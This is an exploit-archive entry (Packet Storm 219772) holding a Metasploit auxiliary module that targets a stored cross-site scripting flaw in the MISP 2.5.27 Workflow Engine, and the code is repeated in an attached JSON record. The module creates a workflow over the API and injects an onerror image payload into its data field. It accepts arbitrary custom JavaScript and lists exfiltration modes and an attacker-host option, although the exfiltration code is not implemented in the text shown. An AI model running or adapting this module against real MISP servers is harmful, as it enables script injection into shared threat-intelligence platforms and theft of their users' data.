📄 MISP 2.5.27 Workflow Engine Cross Site Scripting_PACKETSTORM:219772

Description

This Metasploit auxiliary module targets a potential stored cross site scripting vulnerability in the MISP Workflow Engine. It is designed to interact with the MISP API, create workflows, and inject malicious payloads into workflow data fields...

Visit Original Source

Basic Information

ID PACKETSTORM:219772

Published Apr 24, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : MISP 2.5.27 Workflow Engine Stored XSS Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.misp-project.org/2025/11/27/misp.2.5.27.released.html/ |
==================================================================================================================================

[+] Summary : This Metasploit auxiliary module targets a potential stored Cross-Site Scripting (XSS) vulnerability in the MISP Workflow Engine.
It is designed to interact with the MISP API, create workflows, and inject malicious payloads into workflow data fields.

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner

def initialize(info = {})
super(
update_info(
info,
'Name' => 'MISP Workflow Engine Stored Cross-Site Scripting',
'Description' => %q{...},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux', 'win'],
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => '2025-03-28'
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('API_KEY', [true, 'API key', '']),
OptEnum.new('PAYLOAD_MODE', [true, 'Mode',
'alert', ['alert','alert_info','console','console_info','exfiltrate_users','exfiltrate_page','exfiltrate_events']
]),
OptString.new('ATTACKER_HOST', [false, 'host:port', '127.0.0.1:8000']),
OptInt.new('EXFIL_LIMIT', [true, 'limit', 20]),
OptString.new('CUSTOM_PAYLOAD', [false, 'custom', '']),
OptBool.new('VERIFY_SSL', [true, 'SSL verify', false])
])
end

def setup
@base_url = normalize_uri(target_uri.to_s)
@api_key = datastore['API_KEY']
@mode = datastore['PAYLOAD_MODE']
@attacker_host = datastore['ATTACKER_HOST'].to_s
@limit = datastore['EXFIL_LIMIT'].to_i
@custom_payload = datastore['CUSTOM_PAYLOAD'].to_s
@workflow_id = nil
@trigger_id = nil
end

def run_host(ip)
print_status("Target: #{ip}:#{rport}")

return unless check_vulnerability
return unless create_workflow
return unless inject_payload

verify_payload
print_exploit_info
end

def check_vulnerability
res = send_request_cgi({
'uri' => normalize_uri(@base_url, 'servers/getVersion'),
'method' => 'GET',
'headers' => { 'Authorization' => @api_key }
})

return false unless res && res.body

begin
json = JSON.parse(res.body)
if json['version']
version = json['version'].to_s
if version.start_with?('2.5')
print_good("Version: #{version} (likely vulnerable)")
end
end
rescue
end

res2 = send_request_cgi({
'uri' => normalize_uri(@base_url, 'workflows/index'),
'method' => 'GET',
'headers' => { 'Authorization' => @api_key }
})

return false unless res2

if res2.code == 200
print_good("Workflow API accessible")
return true
end

false
end

def create_workflow
name = "XSS_#{Rex::Text.rand_text_alpha(8)}"

res = send_request_cgi({
'uri' => normalize_uri(@base_url, 'workflows/add'),
'method' => 'POST',
'ctype' => 'application/json',
'data' => { 'Workflow' => { 'name' => name } }.to_json,
'headers' => { 'Authorization' => @api_key }
})

return false unless res && res.body

json = JSON.parse(res.body) rescue nil
return false unless json

wf = json.dig('saved', 'Workflow') || json['Workflow']
return false unless wf

@workflow_id = wf['id'].to_s
@trigger_id = wf['trigger_id'].to_s

return false if @workflow_id.empty? || @trigger_id.empty?

print_good("Workflow: #{@workflow_id}")
true
end

def build_js_payload
return @custom_payload unless @custom_payload.empty?

case @mode
when 'alert'
"alert('MISP XSS');"
when 'console'
"console.log('MISP XSS');"
else
"alert('XSS');"
end
end

def build_html_payload(js)
"<img src=x onerror=\"#{js.gsub('"','\"')}\">"
end

def inject_payload
return false unless @workflow_id && @trigger_id

js = build_js_payload
html = build_html_payload(js)

res = send_request_cgi({
'uri' => normalize_uri(@base_url, "workflows/edit/#{@workflow_id}"),
'method' => 'POST',
'ctype' => 'application/json',
'data' => {
'Workflow' => {
'id' => @workflow_id,
'data' => html
}
}.to_json,
'headers' => { 'Authorization' => @api_key }
})

if res && res.code == 200
print_good("Payload injected")
return true
end

false
end

def verify_payload
return unless @workflow_id

res = send_request_cgi({
'uri' => normalize_uri(@base_url, "workflows/view/#{@workflow_id}"),
'method' => 'GET',
'headers' => { 'Authorization' => @api_key }
})

return false unless res && res.body
if res.body.include?(@workflow_id)
print_good("Workflow exists (not reliable XSS proof)")
return true
end

false
end

def print_exploit_info
return unless @workflow_id

url = normalize_uri(@base_url, "workflows/view/#{@workflow_id}")

print_good("URL: #{url}")

report_note(
host: (defined?(rhost) ? rhost : nil),
port: (defined?(rport) ? rport : nil),
type: 'misp.xss',
data: { workflow_id: @workflow_id, url: url },
update: :unique_data
)
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-24T20:45:25",
    "description": "This Metasploit auxiliary module targets a potential stored cross site scripting vulnerability in the MISP Workflow Engine. It is designed to interact with the MISP API, create workflows, and inject malicious payloads into workflow data fields...",
    "published": "2026-04-24T00:00:00",
    "modified": "2026-04-24T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 MISP 2.5.27 Workflow Engine Cross Site Scripting",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219772",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : MISP 2.5.27 Workflow Engine Stored XSS Metasploit Module                                                         |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://www.misp-project.org/2025/11/27/misp.2.5.27.released.html/                                               |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Metasploit auxiliary module targets a potential stored Cross-Site Scripting (XSS) vulnerability in the MISP Workflow Engine. \n                     It is designed to interact with the MISP API, create workflows, and inject malicious payloads into workflow data fields.\n    \n    \n    [+] POC        :  \n    \n    ##\n    # This module requires Metasploit: https://metasploit.com/download\n    ##\n    \n    class MetasploitModule < Msf::Auxiliary\n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Auxiliary::Report\n      include Msf::Auxiliary::Scanner\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'MISP Workflow Engine Stored Cross-Site Scripting',\n            'Description' => %q{...},\n            'Author' => ['indoushka'],\n            'License' => MSF_LICENSE,\n            'Platform' => ['unix', 'linux', 'win'],\n            'Targets' => [['Automatic', {}]],\n            'DefaultTarget' => 0,\n            'DisclosureDate' => '2025-03-28'\n          )\n        )\n    \n        register_options([\n          OptString.new('TARGETURI', [true, 'Base path', '/']),\n          OptString.new('API_KEY', [true, 'API key', '']),\n          OptEnum.new('PAYLOAD_MODE', [true, 'Mode',\n            'alert', ['alert','alert_info','console','console_info','exfiltrate_users','exfiltrate_page','exfiltrate_events']\n          ]),\n          OptString.new('ATTACKER_HOST', [false, 'host:port', '127.0.0.1:8000']),\n          OptInt.new('EXFIL_LIMIT', [true, 'limit', 20]),\n          OptString.new('CUSTOM_PAYLOAD', [false, 'custom', '']),\n          OptBool.new('VERIFY_SSL', [true, 'SSL verify', false])\n        ])\n      end\n    \n      def setup\n        @base_url = normalize_uri(target_uri.to_s)\n        @api_key = datastore['API_KEY']\n        @mode = datastore['PAYLOAD_MODE']\n        @attacker_host = datastore['ATTACKER_HOST'].to_s\n        @limit = datastore['EXFIL_LIMIT'].to_i\n        @custom_payload = datastore['CUSTOM_PAYLOAD'].to_s\n        @workflow_id = nil\n        @trigger_id = nil\n      end\n    \n      def run_host(ip)\n        print_status(\"Target: #{ip}:#{rport}\")\n    \n        return unless check_vulnerability\n        return unless create_workflow\n        return unless inject_payload\n    \n        verify_payload\n        print_exploit_info\n      end\n    \n      def check_vulnerability\n        res = send_request_cgi({\n          'uri' => normalize_uri(@base_url, 'servers/getVersion'),\n          'method' => 'GET',\n          'headers' => { 'Authorization' => @api_key }\n        })\n    \n        return false unless res && res.body\n    \n        begin\n          json = JSON.parse(res.body)\n          if json['version']\n            version = json['version'].to_s\n            if version.start_with?('2.5')\n              print_good(\"Version: #{version} (likely vulnerable)\")\n            end\n          end\n        rescue\n        end\n    \n        res2 = send_request_cgi({\n          'uri' => normalize_uri(@base_url, 'workflows/index'),\n          'method' => 'GET',\n          'headers' => { 'Authorization' => @api_key }\n        })\n    \n        return false unless res2\n    \n        if res2.code == 200\n          print_good(\"Workflow API accessible\")\n          return true\n        end\n    \n        false\n      end\n    \n      def create_workflow\n        name = \"XSS_#{Rex::Text.rand_text_alpha(8)}\"\n    \n        res = send_request_cgi({\n          'uri' => normalize_uri(@base_url, 'workflows/add'),\n          'method' => 'POST',\n          'ctype' => 'application/json',\n          'data' => { 'Workflow' => { 'name' => name } }.to_json,\n          'headers' => { 'Authorization' => @api_key }\n        })\n    \n        return false unless res && res.body\n    \n        json = JSON.parse(res.body) rescue nil\n        return false unless json\n    \n        wf = json.dig('saved', 'Workflow') || json['Workflow']\n        return false unless wf\n    \n        @workflow_id = wf['id'].to_s\n        @trigger_id = wf['trigger_id'].to_s\n    \n        return false if @workflow_id.empty? || @trigger_id.empty?\n    \n        print_good(\"Workflow: #{@workflow_id}\")\n        true\n      end\n    \n      def build_js_payload\n        return @custom_payload unless @custom_payload.empty?\n    \n        case @mode\n        when 'alert'\n          \"alert('MISP XSS');\"\n        when 'console'\n          \"console.log('MISP XSS');\"\n        else\n          \"alert('XSS');\"\n        end\n      end\n    \n      def build_html_payload(js)\n        \"<img src=x onerror=\\\"#{js.gsub('\"','\\\"')}\\\">\"\n      end\n    \n      def inject_payload\n        return false unless @workflow_id && @trigger_id\n    \n        js = build_js_payload\n        html = build_html_payload(js)\n    \n        res = send_request_cgi({\n          'uri' => normalize_uri(@base_url, \"workflows/edit/#{@workflow_id}\"),\n          'method' => 'POST',\n          'ctype' => 'application/json',\n          'data' => {\n            'Workflow' => {\n              'id' => @workflow_id,\n              'data' => html\n            }\n          }.to_json,\n          'headers' => { 'Authorization' => @api_key }\n        })\n    \n        if res && res.code == 200\n          print_good(\"Payload injected\")\n          return true\n        end\n    \n        false\n      end\n    \n      def verify_payload\n        return unless @workflow_id\n    \n        res = send_request_cgi({\n          'uri' => normalize_uri(@base_url, \"workflows/view/#{@workflow_id}\"),\n          'method' => 'GET',\n          'headers' => { 'Authorization' => @api_key }\n        })\n    \n        return false unless res && res.body\n        if res.body.include?(@workflow_id)\n          print_good(\"Workflow exists (not reliable XSS proof)\")\n          return true\n        end\n    \n        false\n      end\n    \n      def print_exploit_info\n        return unless @workflow_id\n    \n        url = normalize_uri(@base_url, \"workflows/view/#{@workflow_id}\")\n    \n        print_good(\"URL: #{url}\")\n    \n        report_note(\n          host: (defined?(rhost) ? rhost : nil),\n          port: (defined?(rport) ? rport : nil),\n          type: 'misp.xss',\n          data: { workflow_id: @workflow_id, url: url },\n          update: :unique_data\n        )\n      end\n    end\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219772",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219772/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply